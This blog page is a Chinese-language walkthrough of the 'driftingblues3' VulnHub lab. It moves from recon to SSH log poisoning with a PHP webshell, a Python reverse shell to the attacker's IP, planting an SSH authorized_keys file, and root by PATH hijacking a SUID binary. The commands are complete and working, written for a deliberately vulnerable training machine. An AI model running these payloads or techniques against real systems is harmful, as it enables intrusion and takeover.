<!DOCTYPE html>
<html lang=zh>
<head>
    <!-- so meta -->
    <meta charset="utf-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="HandheldFriendly" content="True">
    <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=5" />
    <meta name="description" content="信息收集主机发现1arp-scan -l   端口扫描1nmap -sC -sV -p- 192.168.62.173    只开放了22和80端口，先访问80端口看看  好像没有什么信息，扫一下目录 1dirsearch -u http:&#x2F;&#x2F;192.168.62.173&#x2F;   有点奇怪，逐个看了一下，好像都是没用的信息  再看看robots.txt，是唯一有用的路径  接着访问一下  emmm再">
<meta property="og:type" content="article">
<meta property="og:title" content="driftingblues3 VulnHub Walkthrough">
<meta property="og:url" content="http://example.com/2021/10/13/driftingblues3-VulnHub-Walkthrough/index.html">
<meta property="og:site_name" content="colind0pe&#39;s blog">
<meta property="og:description" content="信息收集主机发现1arp-scan -l   端口扫描1nmap -sC -sV -p- 192.168.62.173    只开放了22和80端口，先访问80端口看看  好像没有什么信息，扫一下目录 1dirsearch -u http:&#x2F;&#x2F;192.168.62.173&#x2F;   有点奇怪，逐个看了一下，好像都是没用的信息  再看看robots.txt，是唯一有用的路径  接着访问一下  emmm再">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="https://i.loli.net/2021/10/13/gbHz2QBdPq1Fr5m.png">
<meta property="og:image" content="https://i.loli.net/2021/10/13/dyUSqGQHbJYXtcP.png">
<meta property="og:image" content="https://i.loli.net/2021/10/13/v23PbJpqjdwMiXl.png">
<meta property="og:image" content="https://i.loli.net/2021/10/13/QvTbR73iftpaIZY.png">
<meta property="og:image" content="https://i.loli.net/2021/10/13/DcIX8Bov5bh4KlS.png">
<meta property="og:image" content="https://i.loli.net/2021/10/13/Z97ixT5SKCVjzuy.png">
<meta property="og:image" content="https://i.loli.net/2021/10/13/RnyvEz1OImLurMZ.png">
<meta property="og:image" content="https://i.loli.net/2021/10/13/dWAkgJ5BQLy81OI.png">
<meta property="og:image" content="https://i.loli.net/2021/10/13/hV3pdTlWcbvkABE.png">
<meta property="og:image" content="https://i.loli.net/2021/10/13/8EgkBodRq1YjAOH.png">
<meta property="og:image" content="https://i.loli.net/2021/10/13/KC1QoRcmuTqG4fE.png">
<meta property="og:image" content="https://i.loli.net/2021/10/13/JPCuhSeUZXnOkRq.png">
<meta property="og:image" content="https://i.loli.net/2021/10/13/nFKbN5to2rTjSHa.png">
<meta property="og:image" content="https://i.loli.net/2021/10/13/UXd7Z2kRHJmP8cu.png">
<meta property="og:image" content="https://i.loli.net/2021/10/13/VQBO5Tumo1YRdLN.png">
<meta property="og:image" content="https://i.loli.net/2021/10/13/hEsStkQvywi58UL.png">
<meta property="og:image" content="https://i.loli.net/2021/10/13/JajMB9ytKZoHbur.png">
<meta property="og:image" content="https://i.loli.net/2021/10/13/e6KnGq2tVahXDj3.png">
<meta property="og:image" content="https://i.loli.net/2021/10/13/i1go6kHnBwEvKqZ.png">
<meta property="og:image" content="https://i.loli.net/2021/10/13/uRrKZvgWmeOd2wz.png">
<meta property="og:image" content="https://i.loli.net/2021/10/13/86VYpyWAalHc1I3.png">
<meta property="og:image" content="https://i.loli.net/2021/10/13/McPewFdQo6hHbUx.png">
<meta property="og:image" content="https://i.loli.net/2021/10/13/Gj84pDCxswU3HM5.png">
<meta property="og:image" content="https://i.loli.net/2021/10/13/IhaoP4B9NQnbAKF.png">
<meta property="og:image" content="https://i.loli.net/2021/10/13/KzHwX46Zqn2ux51.png">
<meta property="og:image" content="https://i.loli.net/2021/10/13/K9mLIjMbpYq5Du2.png">
<meta property="og:image" content="https://i.loli.net/2021/10/13/JMgydKAf6sW3wYE.png">
<meta property="og:image" content="https://i.loli.net/2021/10/13/vGzTbRejQkKW7NB.png">
<meta property="og:image" content="https://i.loli.net/2021/10/13/jafxOrYPwXck6SQ.png">
<meta property="og:image" content="https://i.loli.net/2021/10/13/N6vYROXlgVuKbWU.png">
<meta property="article:published_time" content="2021-10-13T09:09:41.000Z">
<meta property="article:modified_time" content="2021-12-25T12:19:50.096Z">
<meta property="article:author" content="colind0pe">
<meta property="article:tag" content="VulnHub">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://i.loli.net/2021/10/13/gbHz2QBdPq1Fr5m.png">
    
    
      
        
          <link rel="shortcut icon" href="/images/favicon.ico">
        
      
      
        
          <link rel="icon" type="image/png" href="/images/favicon-192x192.png" sizes="192x192">
        
      
      
        
          <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon.png">
        
      
    
    <!-- title -->
    <title>driftingblues3 VulnHub Walkthrough</title>
    <!-- styles -->
    
<link rel="stylesheet" href="/css/style.css">

    <!-- persian styles -->
    
    <!-- rss -->
    
    
	<!-- mathjax -->
	
<meta name="generator" content="Hexo 5.4.0"></head>

<body class="max-width mx-auto px3 ltr">
    
      <div id="header-post">
  <a id="menu-icon" href="#" aria-label="目录"><i class="fas fa-bars fa-lg"></i></a>
  <a id="menu-icon-tablet" href="#" aria-label="目录"><i class="fas fa-bars fa-lg"></i></a>
  <a id="top-icon-tablet" href="#" aria-label="顶部" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');" style="display:none;"><i class="fas fa-chevron-up fa-lg"></i></a>
  <span id="menu">
    <span id="nav">
      <ul>
        <!--
       --><li><a href="/">首页</a></li><!--
     --><!--
       --><li><a href="/categories/">分类</a></li><!--
     --><!--
       --><li><a href="/archives/">归档</a></li><!--
     --><!--
       --><li><a href="/tags/">标签</a></li><!--
     --><!--
       --><li><a href="/about/">关于</a></li><!--
     --><!--
       --><li><a href="/search/">搜索</a></li><!--
     -->
      </ul>
    </span>
    <br/>
    <span id="actions">
      <ul>
        
        <li><a class="icon" aria-label="上一篇" href="/2021/10/14/driftingblues4-VulnHub-Walkthrough/"><i class="fas fa-chevron-left" aria-hidden="true" onmouseover="$('#i-prev').toggle();" onmouseout="$('#i-prev').toggle();"></i></a></li>
        
        
        <li><a class="icon" aria-label="下一篇" href="/2021/10/12/driftingblues2-VulnHub-Walkthrough/"><i class="fas fa-chevron-right" aria-hidden="true" onmouseover="$('#i-next').toggle();" onmouseout="$('#i-next').toggle();"></i></a></li>
        
        <li><a class="icon" aria-label="返回顶部" href="#" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');"><i class="fas fa-chevron-up" aria-hidden="true" onmouseover="$('#i-top').toggle();" onmouseout="$('#i-top').toggle();"></i></a></li>
        <li><a class="icon" aria-label="分享文章" href="#"><i class="fas fa-share-alt" aria-hidden="true" onmouseover="$('#i-share').toggle();" onmouseout="$('#i-share').toggle();" onclick="$('#share').toggle();return false;"></i></a></li>
      </ul>
      <span id="i-prev" class="info" style="display:none;">上一篇</span>
      <span id="i-next" class="info" style="display:none;">下一篇</span>
      <span id="i-top" class="info" style="display:none;">返回顶部</span>
      <span id="i-share" class="info" style="display:none;">分享文章</span>
    </span>
    <br/>
    <div id="share" style="display: none">
      <ul>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.facebook.com/sharer.php?u=http://example.com/2021/10/13/driftingblues3-VulnHub-Walkthrough/"><i class="fab fa-facebook " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://twitter.com/share?url=http://example.com/2021/10/13/driftingblues3-VulnHub-Walkthrough/&text=driftingblues3 VulnHub Walkthrough"><i class="fab fa-twitter " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.linkedin.com/shareArticle?url=http://example.com/2021/10/13/driftingblues3-VulnHub-Walkthrough/&title=driftingblues3 VulnHub Walkthrough"><i class="fab fa-linkedin " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://pinterest.com/pin/create/bookmarklet/?url=http://example.com/2021/10/13/driftingblues3-VulnHub-Walkthrough/&is_video=false&description=driftingblues3 VulnHub Walkthrough"><i class="fab fa-pinterest " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="mailto:?subject=driftingblues3 VulnHub Walkthrough&body=Check out this article: http://example.com/2021/10/13/driftingblues3-VulnHub-Walkthrough/"><i class="fas fa-envelope " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://getpocket.com/save?url=http://example.com/2021/10/13/driftingblues3-VulnHub-Walkthrough/&title=driftingblues3 VulnHub Walkthrough"><i class="fab fa-get-pocket " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://reddit.com/submit?url=http://example.com/2021/10/13/driftingblues3-VulnHub-Walkthrough/&title=driftingblues3 VulnHub Walkthrough"><i class="fab fa-reddit " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.stumbleupon.com/submit?url=http://example.com/2021/10/13/driftingblues3-VulnHub-Walkthrough/&title=driftingblues3 VulnHub Walkthrough"><i class="fab fa-stumbleupon " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://digg.com/submit?url=http://example.com/2021/10/13/driftingblues3-VulnHub-Walkthrough/&title=driftingblues3 VulnHub Walkthrough"><i class="fab fa-digg " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.tumblr.com/share/link?url=http://example.com/2021/10/13/driftingblues3-VulnHub-Walkthrough/&name=driftingblues3 VulnHub Walkthrough&description="><i class="fab fa-tumblr " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://news.ycombinator.com/submitlink?u=http://example.com/2021/10/13/driftingblues3-VulnHub-Walkthrough/&t=driftingblues3 VulnHub Walkthrough"><i class="fab fa-hacker-news " aria-hidden="true"></i></a></li>
</ul>

    </div>
    <div id="toc">
      <ol class="toc"><li class="toc-item toc-level-3"><a class="toc-link" href="#%E4%BF%A1%E6%81%AF%E6%94%B6%E9%9B%86"><span class="toc-number">1.</span> <span class="toc-text">信息收集</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#%E4%B8%BB%E6%9C%BA%E5%8F%91%E7%8E%B0"><span class="toc-number">1.1.</span> <span class="toc-text">主机发现</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#%E7%AB%AF%E5%8F%A3%E6%89%AB%E6%8F%8F"><span class="toc-number">1.2.</span> <span class="toc-text">端口扫描</span></a></li></ol></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E6%BC%8F%E6%B4%9E%E5%8F%91%E7%8E%B0"><span class="toc-number">2.</span> <span class="toc-text">漏洞发现</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E6%BC%8F%E6%B4%9E%E5%88%A9%E7%94%A8-amp-getshell"><span class="toc-number">3.</span> <span class="toc-text">漏洞利用&amp;getshell</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#%E5%8F%8D%E5%BC%B9shell"><span class="toc-number">3.1.</span> <span class="toc-text">反弹shell</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#SSH%E7%99%BB%E5%BD%95"><span class="toc-number">3.2.</span> <span class="toc-text">SSH登录</span></a></li></ol></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E6%9D%83%E9%99%90%E6%8F%90%E5%8D%87"><span class="toc-number">4.</span> <span class="toc-text">权限提升</span></a></li></ol>
    </div>
  </span>
</div>

    
    <div class="content index py4">
        
        <article class="post" itemscope itemtype="http://schema.org/BlogPosting">
  <header>
    
    <h1 class="posttitle" itemprop="name headline">
        driftingblues3 VulnHub Walkthrough
    </h1>



    <div class="meta">
      <span class="author" itemprop="author" itemscope itemtype="http://schema.org/Person">
        <span itemprop="name">colind0pe</span>
      </span>
      
    <div class="postdate">
      
        <time datetime="2021-10-13T09:09:41.000Z" itemprop="datePublished">2021-10-13</time>
        
      
    </div>


      
    <div class="article-category">
        <i class="fas fa-archive"></i>
        <a class="category-link" href="/categories/%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95/">渗透测试</a>
    </div>


      
    <div class="article-tag">
        <i class="fas fa-tag"></i>
        <a class="tag-link-link" href="/tags/VulnHub/" rel="tag">VulnHub</a>
    </div>


    </div>
  </header>
  

  <div class="content" itemprop="articleBody">
    <h3 id="信息收集"><a href="#信息收集" class="headerlink" title="信息收集"></a>信息收集</h3><h4 id="主机发现"><a href="#主机发现" class="headerlink" title="主机发现"></a>主机发现</h4><figure class="highlight ebnf"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="attribute">arp-scan -l</span></span><br></pre></td></tr></table></figure>

<p><img src="https://i.loli.net/2021/10/13/gbHz2QBdPq1Fr5m.png"></p>
<h4 id="端口扫描"><a href="#端口扫描" class="headerlink" title="端口扫描"></a>端口扫描</h4><figure class="highlight nginx"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="attribute">nmap</span> -sC -sV -p- <span class="number">192.168.62.173</span> </span><br></pre></td></tr></table></figure>

<p><img src="https://i.loli.net/2021/10/13/dyUSqGQHbJYXtcP.png"></p>
<p>只开放了22和80端口，先访问80端口看看</p>
<p><img src="https://i.loli.net/2021/10/13/v23PbJpqjdwMiXl.png"></p>
<p>好像没有什么信息，扫一下目录</p>
<figure class="highlight awk"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">dirsearch -u http:<span class="regexp">//</span><span class="number">192.168</span>.<span class="number">62.173</span>/</span><br></pre></td></tr></table></figure>

<p><img src="https://i.loli.net/2021/10/13/QvTbR73iftpaIZY.png"></p>
<p>有点奇怪，逐个看了一下，好像都是没用的信息</p>
<p><img src="https://i.loli.net/2021/10/13/DcIX8Bov5bh4KlS.png"></p>
<p>再看看robots.txt，是唯一有用的路径</p>
<p><img src="https://i.loli.net/2021/10/13/Z97ixT5SKCVjzuy.png"></p>
<p>接着访问一下</p>
<p><img src="https://i.loli.net/2021/10/13/RnyvEz1OImLurMZ.png"></p>
<p>emmm再接再厉，继续访问</p>
<p><img src="https://i.loli.net/2021/10/13/dWAkgJ5BQLy81OI.png"></p>
<p>好像是诗歌还是歌词，目前没有什么信息，查看一下源码</p>
<p><img src="https://i.loli.net/2021/10/13/hV3pdTlWcbvkABE.png"></p>
<p>base64编码，到在线网站转换一下</p>
<img src="https://i.loli.net/2021/10/13/8EgkBodRq1YjAOH.png" style="zoom: 67%;" />

<p>哎，还要再转换一次</p>
<img src="https://i.loli.net/2021/10/13/KC1QoRcmuTqG4fE.png" style="zoom:67%;" />

<p>提示了一个php文件，去访问一下</p>
<p><img src="https://i.loli.net/2021/10/13/JPCuhSeUZXnOkRq.png"></p>
<h3 id="漏洞发现"><a href="#漏洞发现" class="headerlink" title="漏洞发现"></a>漏洞发现</h3><p>这个php文件是应该ssh登录日志，先随便尝试一下登录，看会不会有记录</p>
<p><img src="https://i.loli.net/2021/10/13/nFKbN5to2rTjSHa.png"></p>
<p>可以看到两个登录用户名都已经记录了，那接下来就尝试通过日志写shell</p>
<p><img src="https://i.loli.net/2021/10/13/UXd7Z2kRHJmP8cu.png"></p>
<h3 id="漏洞利用-amp-getshell"><a href="#漏洞利用-amp-getshell" class="headerlink" title="漏洞利用&amp;getshell"></a>漏洞利用&amp;getshell</h3><p>以php的webshell作为用户名来登录ssh</p>
<figure class="highlight php-template"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="xml">ssh &#x27;</span><span class="php"><span class="meta">&lt;?php</span> system(<span class="variable">$_GET</span>[<span class="string">&quot;cmd&quot;</span>]);<span class="meta">?&gt;</span></span><span class="xml">&#x27;@192.168.62.173</span></span><br></pre></td></tr></table></figure>

<p><img src="https://i.loli.net/2021/10/13/VQBO5Tumo1YRdLN.png"></p>
<p>看一下效果，看到已经可以执行命令了</p>
<p><img src="https://i.loli.net/2021/10/13/hEsStkQvywi58UL.png"></p>
<h4 id="反弹shell"><a href="#反弹shell" class="headerlink" title="反弹shell"></a>反弹shell</h4><p>先看一下有没有python环境</p>
<p><img src="https://i.loli.net/2021/10/13/JajMB9ytKZoHbur.png"></p>
<p>可以看到，靶机是有python3环境的，那就试试python来反弹shell</p>
<p>先开启一个监听端口来接收反弹的shell</p>
<p><img src="https://i.loli.net/2021/10/13/e6KnGq2tVahXDj3.png"></p>
<p>访问一下</p>
<figure class="highlight apache"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="attribute">http</span>://<span class="number">192.168.62.173</span>/adminsfixit.php?cmd=python%<span class="number">20</span>-c%<span class="number">20</span>%<span class="number">27</span>import%<span class="number">20</span>socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((%<span class="number">22192</span>.<span class="number">168</span>.<span class="number">62</span>.<span class="number">134</span>%<span class="number">22</span>,<span class="number">1234</span>));os.dup<span class="number">2</span>(s.fileno(),<span class="number">0</span>);%<span class="number">20</span>os.dup<span class="number">2</span>(s.fileno(),<span class="number">1</span>);os.dup<span class="number">2</span>(s.fileno(),<span class="number">2</span>);import%<span class="number">20</span>pty;%<span class="number">20</span>pty.spawn(%<span class="number">22</span>/bin/bash%<span class="number">22</span>)%<span class="number">27</span></span><br></pre></td></tr></table></figure>

<p>在本机已经接收到了shell</p>
<p><img src="https://i.loli.net/2021/10/13/i1go6kHnBwEvKqZ.png"></p>
<h4 id="SSH登录"><a href="#SSH登录" class="headerlink" title="SSH登录"></a>SSH登录</h4><p>进入到/home/robertj目录，发现.ssh是有写权限的，那我们就可以将我们的公钥写进去，实现免密登录</p>
<p>先在本地生成公私钥</p>
<figure class="highlight 1c"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">ssh-keygen	<span class="meta">#一直回默认就可以</span></span><br></pre></td></tr></table></figure>

<img src="https://i.loli.net/2021/10/13/uRrKZvgWmeOd2wz.png" style="zoom:80%;" />

<p>进入本地ssh目录，查看一下id_rsa.pub</p>
<p><img src="https://i.loli.net/2021/10/13/86VYpyWAalHc1I3.png"></p>
<p>将id_rsa.pub的内容复制到authorized_keys</p>
<figure class="highlight matlab"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="built_in">cat</span> id_rsa.pub &gt;&gt; authorized_keys</span><br></pre></td></tr></table></figure>

<p>然后上传到靶机的ssh目录，先在本机用python开启一个http服务</p>
<figure class="highlight apache"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="attribute">python3</span> -m http.server <span class="number">80</span></span><br></pre></td></tr></table></figure>

<p><img src="https://i.loli.net/2021/10/13/McPewFdQo6hHbUx.png"></p>
<p>到靶机的ssh目录通过wget下载</p>
<figure class="highlight awk"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">wget http:<span class="regexp">//</span><span class="number">192.168</span>.<span class="number">62.134</span>/authorized_keys</span><br></pre></td></tr></table></figure>

<p><img src="https://i.loli.net/2021/10/13/Gj84pDCxswU3HM5.png"></p>
<p>现在可以实现ssh免密登录了</p>
<p><img src="https://i.loli.net/2021/10/13/IhaoP4B9NQnbAKF.png"></p>
<p>先获取第一个flag</p>
<img src="https://i.loli.net/2021/10/13/KzHwX46Zqn2ux51.png" style="zoom:67%;" />

<h3 id="权限提升"><a href="#权限提升" class="headerlink" title="权限提升"></a>权限提升</h3><p>先看一下具有suid的可执行文件</p>
<figure class="highlight routeros"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="builtin-name">find</span> / -perm <span class="attribute">-u</span>=s -type f 2&gt;/dev/<span class="literal">null</span></span><br></pre></td></tr></table></figure>

<p><img src="https://i.loli.net/2021/10/13/K9mLIjMbpYq5Du2.png"></p>
<p>看到有一个getinfo命令，先执行一下看看</p>
<img src="https://i.loli.net/2021/10/13/JMgydKAf6sW3wYE.png"  />

<p>看着应该是分别执行了ip a、cat /etc/hosts、uname -a命令</p>
<p>那么执行具有suid的getinfo时，将会执行ip、cat、uname，那我们就可以写一个模拟可执行文件</p>
<p>这里我在tmp目录新建一个文件ip，并赋予执行权限</p>
<figure class="highlight awk"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">echo <span class="string">&quot;/bin/bash&quot;</span> &gt; <span class="regexp">/tmp/i</span>p</span><br><span class="line">chmod +x <span class="regexp">/tmp/i</span>p</span><br></pre></td></tr></table></figure>

<p><img src="https://i.loli.net/2021/10/13/vGzTbRejQkKW7NB.png"></p>
<p>最后，添加一个环境变量/tmp，这样再执行一次具有suid的getinfo时，就会以root权限执行我们新建的/tmp/ip，我们就可以提权到root了</p>
<figure class="highlight routeros"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"><span class="builtin-name">export</span> <span class="attribute">PATH</span>=/tmp:$PATH</span><br><span class="line">/usr/bin/getinfo</span><br></pre></td></tr></table></figure>

<p><img src="https://i.loli.net/2021/10/13/jafxOrYPwXck6SQ.png"></p>
<p>现在可以获取第二个flag了</p>
<img src="https://i.loli.net/2021/10/13/N6vYROXlgVuKbWU.png" style="zoom:67%;" />


  </div>
</article>



        
          <div id="footer-post-container">
  <div id="footer-post">

    <div id="nav-footer" style="display: none">
      <ul>
         
          <li><a href="/">首页</a></li>
         
          <li><a href="/categories/">分类</a></li>
         
          <li><a href="/archives/">归档</a></li>
         
          <li><a href="/tags/">标签</a></li>
         
          <li><a href="/about/">关于</a></li>
         
          <li><a href="/search/">搜索</a></li>
        
      </ul>
    </div>

    <div id="toc-footer" style="display: none">
      <ol class="toc"><li class="toc-item toc-level-3"><a class="toc-link" href="#%E4%BF%A1%E6%81%AF%E6%94%B6%E9%9B%86"><span class="toc-number">1.</span> <span class="toc-text">信息收集</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#%E4%B8%BB%E6%9C%BA%E5%8F%91%E7%8E%B0"><span class="toc-number">1.1.</span> <span class="toc-text">主机发现</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#%E7%AB%AF%E5%8F%A3%E6%89%AB%E6%8F%8F"><span class="toc-number">1.2.</span> <span class="toc-text">端口扫描</span></a></li></ol></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E6%BC%8F%E6%B4%9E%E5%8F%91%E7%8E%B0"><span class="toc-number">2.</span> <span class="toc-text">漏洞发现</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E6%BC%8F%E6%B4%9E%E5%88%A9%E7%94%A8-amp-getshell"><span class="toc-number">3.</span> <span class="toc-text">漏洞利用&amp;getshell</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#%E5%8F%8D%E5%BC%B9shell"><span class="toc-number">3.1.</span> <span class="toc-text">反弹shell</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#SSH%E7%99%BB%E5%BD%95"><span class="toc-number">3.2.</span> <span class="toc-text">SSH登录</span></a></li></ol></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E6%9D%83%E9%99%90%E6%8F%90%E5%8D%87"><span class="toc-number">4.</span> <span class="toc-text">权限提升</span></a></li></ol>
    </div>

    <div id="share-footer" style="display: none">
      <ul>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.facebook.com/sharer.php?u=http://example.com/2021/10/13/driftingblues3-VulnHub-Walkthrough/"><i class="fab fa-facebook fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://twitter.com/share?url=http://example.com/2021/10/13/driftingblues3-VulnHub-Walkthrough/&text=driftingblues3 VulnHub Walkthrough"><i class="fab fa-twitter fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.linkedin.com/shareArticle?url=http://example.com/2021/10/13/driftingblues3-VulnHub-Walkthrough/&title=driftingblues3 VulnHub Walkthrough"><i class="fab fa-linkedin fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://pinterest.com/pin/create/bookmarklet/?url=http://example.com/2021/10/13/driftingblues3-VulnHub-Walkthrough/&is_video=false&description=driftingblues3 VulnHub Walkthrough"><i class="fab fa-pinterest fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="mailto:?subject=driftingblues3 VulnHub Walkthrough&body=Check out this article: http://example.com/2021/10/13/driftingblues3-VulnHub-Walkthrough/"><i class="fas fa-envelope fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://getpocket.com/save?url=http://example.com/2021/10/13/driftingblues3-VulnHub-Walkthrough/&title=driftingblues3 VulnHub Walkthrough"><i class="fab fa-get-pocket fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://reddit.com/submit?url=http://example.com/2021/10/13/driftingblues3-VulnHub-Walkthrough/&title=driftingblues3 VulnHub Walkthrough"><i class="fab fa-reddit fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.stumbleupon.com/submit?url=http://example.com/2021/10/13/driftingblues3-VulnHub-Walkthrough/&title=driftingblues3 VulnHub Walkthrough"><i class="fab fa-stumbleupon fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://digg.com/submit?url=http://example.com/2021/10/13/driftingblues3-VulnHub-Walkthrough/&title=driftingblues3 VulnHub Walkthrough"><i class="fab fa-digg fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.tumblr.com/share/link?url=http://example.com/2021/10/13/driftingblues3-VulnHub-Walkthrough/&name=driftingblues3 VulnHub Walkthrough&description="><i class="fab fa-tumblr fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://news.ycombinator.com/submitlink?u=http://example.com/2021/10/13/driftingblues3-VulnHub-Walkthrough/&t=driftingblues3 VulnHub Walkthrough"><i class="fab fa-hacker-news fa-lg" aria-hidden="true"></i></a></li>
</ul>

    </div>

    <div id="actions-footer">
        <a id="menu" class="icon" href="#" onclick="$('#nav-footer').toggle();return false;"><i class="fas fa-bars fa-lg" aria-hidden="true"></i> 菜单</a>
        <a id="toc" class="icon" href="#" onclick="$('#toc-footer').toggle();return false;"><i class="fas fa-list fa-lg" aria-hidden="true"></i> 目录</a>
        <a id="share" class="icon" href="#" onclick="$('#share-footer').toggle();return false;"><i class="fas fa-share-alt fa-lg" aria-hidden="true"></i> 分享</a>
        <a id="top" style="display:none" class="icon" href="#" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');"><i class="fas fa-chevron-up fa-lg" aria-hidden="true"></i> 返回顶部</a>
    </div>

  </div>
</div>

        
        <footer id="footer">
  <div class="footer-left">
    Copyright &copy;
    
    
    2020-2022
    colind0pe
  </div>
  <div class="footer-right">
    <nav>
      <ul>
        <!--
       --><li><a href="/">首页</a></li><!--
     --><!--
       --><li><a href="/categories/">分类</a></li><!--
     --><!--
       --><li><a href="/archives/">归档</a></li><!--
     --><!--
       --><li><a href="/tags/">标签</a></li><!--
     --><!--
       --><li><a href="/about/">关于</a></li><!--
     --><!--
       --><li><a href="/search/">搜索</a></li><!--
     -->
      </ul>
    </nav>
  </div>
</footer>

    </div>
    <!-- styles -->



  <link rel="preload" as="style" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/5.15.2/css/all.min.css" crossorigin="anonymous" onload="this.onload=null;this.rel='stylesheet'"/>


    <!-- jquery -->
 
  <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.6.0/jquery.min.js" crossorigin="anonymous"></script> 




<!-- clipboard -->

  
    <script src="https://cdnjs.cloudflare.com/ajax/libs/clipboard.js/2.0.7/clipboard.min.js" crossorigin="anonymous"></script> 
  
  <script type="text/javascript">
  $(function() {
    // copy-btn HTML
    var btn = "<span class=\"btn-copy tooltipped tooltipped-sw\" aria-label=\"复制到粘贴板！\">";
    btn += '<i class="far fa-clone"></i>';
    btn += '</span>'; 
    // mount it!
    $(".highlight table").before(btn);
    var clip = new ClipboardJS('.btn-copy', {
      text: function(trigger) {
        return Array.from(trigger.nextElementSibling.querySelectorAll('.code')).reduce((str,it)=>str+it.innerText+'\n','')
      }
    });
    clip.on('success', function(e) {
      e.trigger.setAttribute('aria-label', "复制成功！");
      e.clearSelection();
    })
  })
  </script>


<script src="/js/main.js"></script>

<!-- search -->

<!-- Google Analytics -->

<!-- Baidu Analytics -->

<!-- Cloudflare Analytics -->

<!-- Umami Analytics -->

<!-- Disqus Comments -->

<!-- utterances Comments -->

</body>
</html>
